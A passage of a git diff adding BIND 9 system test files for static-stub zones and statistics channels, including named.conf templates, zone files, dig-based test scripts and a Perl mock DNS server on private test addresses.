b/bin/tests/system/staticstub/ns4/named.conf.in new file mode 100644 index 0000000..40c2a17 --- /dev/null +++ b/bin/tests/system/staticstub/ns4/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { ::1; }; + recursion no; + dnssec-validation no; + notify no; +}; + +zone "example.com" { + type primary; + file "example.com.db"; +}; + +zone "example.org" { + type primary; + file "example.org.db"; +}; + +zone "sub.example" { + type primary; + file "sub.example.db.signed"; +}; + +zone "example.info" { + type primary; + file "example.info.db"; +}; diff --git a/bin/tests/system/staticstub/ns4/sign.sh b/bin/tests/system/staticstub/ns4/sign.sh new file mode 100755 index 0000000..14c5072 --- /dev/null +++ b/bin/tests/system/staticstub/ns4/sign.sh @@ -0,0 +1,26 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=sub.example +infile=${zone}.db.in +zonefile=${zone}.db + +keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK -n zone $zone) + +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -o $zone $zonefile > /dev/null diff --git a/bin/tests/system/staticstub/ns4/sub.example.db.in b/bin/tests/system/staticstub/ns4/sub.example.db.in new file mode 100644 index 0000000..255396b --- /dev/null +++ b/bin/tests/system/staticstub/ns4/sub.example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +sub.example. IN SOA ns.sub.example. hostmaster.example. ( + 2010080900 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +sub.example. NS ns.sub.example. +ns.sub.example. A 10.53.0.4 + +data1.sub.example. TXT "1st sub test data" +data2.sub.example. TXT "2nd sub test data" +data3.sub.example. TXT "3rd sub test data" diff --git a/bin/tests/system/staticstub/setup.sh b/bin/tests/system/staticstub/setup.sh new file mode 100755 index 0000000..8d8037d --- /dev/null +++ b/bin/tests/system/staticstub/setup.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in tmp +sed 's/SERVER_CONFIG_PLACEHOLDER/server-names { "ns.example.net"; };/' tmp > ns2/named.conf + +copy_setports ns3/named.conf.in tmp +sed 's/EXAMPLE_ZONE_PLACEHOLDER/zone "example" { type master; file "example.db.signed"; };/' tmp > ns3/named.conf + +copy_setports ns4/named.conf.in ns4/named.conf + +cd ns3 && $SHELL -e sign.sh diff --git a/bin/tests/system/staticstub/tests.sh b/bin/tests/system/staticstub/tests.sh new file mode 100755 index 0000000..bd4167e --- /dev/null +++ b/bin/tests/system/staticstub/tests.sh @@ -0,0 +1,218 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +for conf in conf/good*.conf +do + n=`expr $n + 1` + echo_i "checking that $conf is accepted ($n)" + ret=0 + $CHECKCONF "$conf" || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for conf in conf/bad*.conf +do + n=`expr $n + 1` + echo_i "checking that $conf is rejected ($n)" + ret=0 + $CHECKCONF "$conf" >/dev/null && ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +n=`expr $n + 1` +echo_i "trying an axfr that should be denied (NOTAUTH) ($n)" +ret=0 +$DIG $DIGOPTS +tcp data.example. @10.53.0.2 axfr > dig.out.ns2.test$n || ret=1 +grep "; Transfer failed." dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "non recursive query for a static-stub zone with server name should be rejected ($n)" +ret=0 + $DIG $DIGOPTS +tcp +norec data.example. @10.53.0.2 txt > dig.out.ns2.test$n \ + || ret=1 +grep "REFUSED" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "non recursive query for a static-stub zone with server name should be rejected ($n)" +ret=0 +$DIG $DIGOPTS +tcp +norec data.example.org. @10.53.0.2 txt > dig.out.ns2.test$n \ + || ret=1 +grep "REFUSED" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "allow-query ACL ($n)" +ret=0 +$DIG $DIGOPTS +tcp +norec data.example. @10.53.0.2 txt -b 10.53.0.7 \ + > dig.out.ns2.test$n || ret=1 +grep "REFUSED" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "look for static-stub zone data with recursion (should be found) ($n)" +ret=0 +$DIG $DIGOPTS +tcp +noauth data.example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +digcomp knowngood.dig.out.rec dig.out.ns2.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking authoritative NS is ignored for delegation ($n)" +ret=0 +# the auth server returns a different (and incorrect) NS for .example. +$DIG $DIGOPTS +tcp example. @10.53.0.2 ns > dig.out.ns2.test1.$n || ret=1 +grep "ns4.example." dig.out.ns2.test1.$n > /dev/null || ret=1 +# but static-stub configuration should still be used +$DIG $DIGOPTS +tcp data2.example. @10.53.0.2 txt > dig.out.ns2.test2.$n || ret=1 +grep "2nd test data" dig.out.ns2.test2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking queries for a child zone of the static-stub zone ($n)" +ret=0 +# prime the delegation to a child zone of the static-stub zone +$DIG $DIGOPTS +tcp data1.sub.example. @10.53.0.2 txt > dig.out.ns2.test1.$n || ret=1 +grep "1st sub test data" dig.out.ns2.test1.$n > /dev/null || ret=1 +# temporarily disable the the parent zone +copy_setports ns3/named.conf.in tmp +sed 's/EXAMPLE_ZONE_PLACEHOLDER//' tmp > ns3/named.conf +rndc_reload ns3 10.53.0.3 +# query the child zone again. this should directly go to the child and +# succeed. +for i in 0 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS +tcp data2.sub.example. @10.53.0.2 txt > dig.out.ns2.test2.$n || ret=1 + grep "2nd sub test data" dig.out.ns2.test2.$n > /dev/null && break + sleep 1 +done +grep "2nd sub test data" dig.out.ns2.test2.$n > /dev/null || ret=1 +# re-enable the parent +copy_setports ns3/named.conf.in tmp +sed 's/EXAMPLE_ZONE_PLACEHOLDER/zone "example" { type master; file "example.db.signed"; };/' tmp > ns3/named.conf +rndc_reload ns3 10.53.0.3 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking authoritative NS addresses are ignored for delegation ($n)" +ret=0 +# the auth server returns a different (and incorrect) A/AAA RR for .example. +$DIG $DIGOPTS +tcp example. @10.53.0.2 a > dig.out.ns2.test1.$n || ret=1 +grep "10.53.0.4" dig.out.ns2.test1.$n > /dev/null || ret=1 +$DIG $DIGOPTS +tcp example. @10.53.0.2 aaaa > dig.out.ns2.test2.$n || ret=1 +grep "::1" dig.out.ns2.test2.$n > /dev/null || ret=1 +# reload the server. this will flush the ADB. +rndc_reload ns2 10.53.0.2 +# ask another RR that would require delegation. static-stub configuration +# should still be used instead of the authoritative A/AAAA cached above. +$DIG $DIGOPTS +tcp data3.example. @10.53.0.2 txt > dig.out.ns2.test3.$n || ret=1 +grep "3rd test data" dig.out.ns2.test3.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# the authoritative server of the query domain (example.com) is the apex +# name of the static-stub zone (example). in this case the static-stub +# configuration must be ignored and cached information must be used. +n=`expr $n + 1` +echo_i "checking NS of static-stub is ignored when referenced from other domain ($n)" +ret=0 +$DIG $DIGOPTS +tcp data.example.com. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "example com data" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# check server-names +n=`expr $n + 1` +echo_i "checking static-stub with a server-name ($n)" +ret=0 +$DIG $DIGOPTS +tcp data.example.org. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "example org data" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +# Note: for a short term workaround we use ::1, assuming it's configured and +# usable for our tests. We should eventually use the test ULA and available +# checks introduced in change 2916. +if testsock6 ::1 +then + echo_i "checking IPv6 static-stub address ($n)" + ret=0 + $DIG $DIGOPTS +tcp data.example.info. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 + grep "example info data" dig.out.ns2.test$n > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +else + echo_i "SKIPPED: checking IPv6 static-stub address ($n)" +fi + +n=`expr $n + 1` +echo_i "look for static-stub zone data with DNSSEC validation ($n)" +ret=0 +$DIG $DIGOPTS +tcp +dnssec data4.example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "ad; QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep "4th test data" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "look for a child of static-stub zone data with DNSSEC validation ($n)" +ret=0 +$DIG $DIGOPTS +tcp +dnssec data3.sub.example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "ad; QUERY" dig.out.ns2.test$n > /dev/null || ret=1 +grep "3rd sub test data" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# reload with a different name server: existing zone shouldn't be reused. +n=`expr $n + 1` +echo_i "checking server reload with a different static-stub config ($n)" +ret=0 +copy_setports ns2/named.conf.in tmp +sed 's/SERVER_CONFIG_PLACEHOLDER/server-addresses { 10.53.0.4; };/' tmp > ns2/named.conf +rndc_reload ns2 10.53.0.2 +$DIG $DIGOPTS +tcp data2.example.org. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "2nd example org data" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking static-stub of a undelegated tld resolves after DS query ($n)" +ret=0 +$DIG $DIGOPTS undelegated. @10.53.0.2 ds > dig.out.ns2.ds.test$n +$DIG $DIGOPTS undelegated. @10.53.0.2 soa > dig.out.ns2.soa.test$n +grep "status: NXDOMAIN" dig.out.ns2.ds.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns2.soa.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/statistics/ans4/ans.pl b/bin/tests/system/statistics/ans4/ans.pl new file mode 100644 index 0000000..3a37a82 --- /dev/null +++ b/bin/tests/system/statistics/ans4/ans.pl @@ -0,0 +1,118 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Ad hoc name server +# + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.4", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +for (;;) { + $sock->recv($buf, 512); + + print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n"; + + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + my $donotrespond = 0; + + if ($qname eq "foo.info") { + $donotrespond = 1; + } elsif ($qname eq "cname1.example.com") { + # Data for the "cname + other data / 1" test + $packet->push("answer", new Net::DNS::RR("cname1.example.com 300 CNAME cname1.example.com")); + $packet->push("answer", new Net::DNS::RR("cname1.example.com 300 A 1.2.3.4")); + } elsif ($qname eq "cname2.example.com") { + # Data for the "cname + other data / 2" test: same RRs in opposite order + $packet->push("answer", new Net::DNS::RR("cname2.example.com 300 A 1.2.3.4")); + $packet->push("answer", new Net::DNS::RR("cname2.example.com 300 CNAME cname2.example.com")); + } elsif ($qname eq "www.example.org" || $qname eq "www.example.net" || + $qname eq "badcname.example.org" || + $qname eq "goodcname.example.org" || + $qname eq "foo.baddname.example.org" || + $qname eq "foo.gooddname.example.org") { + # Data for address/alias filtering. + $packet->header->aa(1); + if ($qtype eq "A") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 A 192.0.2.1")); + } elsif ($qtype eq "AAAA") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 AAAA 2001:db8:beef::1")); + } + } elsif ($qname eq "badcname.example.net" || + $qname eq "goodcname.example.net") { + # Data for CNAME/DNAME filtering. We need to make one-level + # delegation to avoid automatic acceptance for subdomain aliases + $packet->push("authority", new Net::DNS::RR("example.net 300 NS ns.example.net")); + $packet->push("additional", new Net::DNS::RR("ns.example.net 300 A 10.53.0.3")); + } elsif ($qname =~ /^nodata\.example\.net$/i) { + $packet->header->aa(1); + } elsif ($qname =~ /^nxdomain\.example\.net$/i) { + $packet->header->aa(1); + $packet->header->rcode(NXDOMAIN); + } elsif ($qname =~ /sub\.example\.org/) { + # Data for CNAME/DNAME filtering. The final answers are + # expected to be accepted regardless of the filter setting. + $packet->push("authority", new Net::DNS::RR("sub.example.org 300 NS ns.sub.example.org")); + $packet->push("additional", new Net::DNS::RR("ns.sub.example.org 300 A 10.53.0.3")); + } else { + # Data for the "bogus referrals" test + $packet->push("authority", new Net::DNS::RR("below.www.example.com 300 NS ns.below.www.example.com")); + $packet->push("additional", new Net::DNS::RR("ns.below.www.example.com 300 A 10.53.0.3")); + } + + if ($donotrespond == 0) { + $sock->send($packet->data); + print "RESPONSE:\n"; + $packet->print; + print "\n"; + } +} diff --git a/bin/tests/system/statistics/clean.sh b/bin/tests/system/statistics/clean.sh new file mode 100644 index 0000000..da49585 --- /dev/null +++ b/bin/tests/system/statistics/clean.sh @@ -0,0 +1,32 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after zone transfer tests. +# + +rm -f ns3/example.bk +rm -f ns3/internal.bk +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f */ans.run +rm -f */named.stats +rm -f */named.stats-stage* +rm -f dig.out* +rm -f curl.out.* +rm -f ns*/named.lock +rm -f stats*out +rm -f ns*/managed-keys.bind* +rm -f xsltproc.out.* +rm -f named.stats.* diff --git a/bin/tests/system/statistics/ns1/named.conf.in b/bin/tests/system/statistics/ns1/named.conf.in new file mode 100644 index 0000000..8fd14f9 --- /dev/null +++ b/bin/tests/system/statistics/ns1/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +statistics-channels { + inet 10.53.0.1 port @EXTRAPORT1@ allow { any; }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "example.info." { + type primary; + file "example-info.db"; +}; + +zone "32/1.0.0.127-in-addr.example." { + type primary; + file "zone.db"; +}; diff --git a/bin/tests/system/statistics/ns1/root.db b/bin/tests/system/statistics/ns1/root.db new file mode 100644 index 0000000..17780d1 --- /dev/null +++ b/bin/tests/system/statistics/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/statistics/ns1/zone.db b/bin/tests/system/statistics/ns1/zone.db new file mode 100644 index 0000000..7feee2c --- /dev/null +++ b/bin/tests/system/statistics/ns1/zone.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 IN SOA ns.example. hostmaster.example. 1 3600 1200 604800 3600 +@ 3600 IN NS ns.example. +ns.example. 3600 IN A 10.53.0.1 diff --git a/bin/tests/system/statistics/ns2/example.db b/bin/tests/system/statistics/ns2/example.db new file mode 100644 index 0000000..4d60ce3 --- /dev/null +++ b/bin/tests/system/statistics/ns2/example.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 + +$ORIGIN example. +a A 10.0.0.1 + MX 10 mail.example. + +mail A 10.0.0.2 diff --git a/bin/tests/system/statistics/ns2/internal.db b/bin/tests/system/statistics/ns2/internal.db new file mode 100644 index 0000000..4f1014f --- /dev/null +++ b/bin/tests/system/statistics/ns2/internal.db @@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 2 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +a A 10.1.0.1 + MX 10 intmail.example. + +intmail A 10.1.0.2 diff --git a/bin/tests/system/statistics/ns2/named.conf.in b/bin/tests/system/statistics/ns2/named.conf.in new file mode 100644 index 0000000..4e02037 --- /dev/null +++ b/bin/tests/system/statistics/ns2/named.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +statistics-channels { + inet 10.53.0.2 port @EXTRAPORT1@ allow { any; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; + allow-update { any; }; +}; diff --git a/bin/tests/system/statistics/ns2/named2.conf.in b/bin/tests/system/statistics/ns2/named2.conf.in new file mode 100644 index 0000000..f2deebf --- /dev/null +++ b/bin/tests/system/statistics/ns2/named2.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +statistics-channels { + inet 10.53.0.2 port @EXTRAPORT1@ allow { any; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; + allow-update { any; }; + zone-statistics full; +}; diff --git a/bin/tests/system/statistics/ns3/internal.db b/bin/tests/system/statistics/ns3/internal.db new file mode 100644 index 0000000..c93c2b0 --- /dev/null +++ b/bin/tests/system/statistics/ns3/internal.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +a A 10.1.0.1 + MX 10 intmail.example. + +intmail A 10.1.0.2 diff --git a/bin/tests/system/statistics/ns3/named.conf.in b/bin/tests/system/statistics/ns3/named.conf.in new file mode 100644 index 0000000..62613a1 --- /dev/null +++ b/bin/tests/system/statistics/ns3/named.conf.in @@ -0,0 +1,59 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; + qname-minimization disabled; + zone-statistics yes; + glue-cache yes; +}; + +statistics-channels { + inet 10.53.0.3 port @EXTRAPORT1@ allow { any; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "root.hint"; +}; + +zone "example" { + type primary; + allow-update { any; }; + file "internal.db"; +}; + +zone "a-secondary" { + type secondary; + file "sec.bk"; + primaries { 10.53.0.1; }; +}; diff --git a/bin/tests/system/statistics/ns3/root.hint b/bin/tests/system/statistics/ns3/root.hint new file mode 100644 index 0000000..dbc4a42 --- /dev/null +++ b/bin/tests/system/statistics/ns3/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS d.root-servers.nil. +d.root-servers.nil. IN A 10.53.0.4 diff --git a/bin/tests/system/statistics/prereq.sh b/bin/tests/system/statistics/prereq.sh new file mode 100644 index 0000000..221138f --- /dev/null +++ b/bin/tests/system/statistics/prereq.sh @@ -0,0 +1,29 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION >= 0.76 && $Net::DNS::VERSION <= 0.77);' 2>/dev/null + then + : + else + echo_i "Net::DNS version 0.76 and 0.77 have a bug that causes this test to fail: please update." >&2 + exit 1 + fi +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi diff --git a/bin/tests/system/statistics/setup.sh b/bin/tests/system/statistics/setup.sh new file mode 100644 index 0000000..57e0575 --- /dev/null +++ b/bin/tests/system/statistics/setup.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, 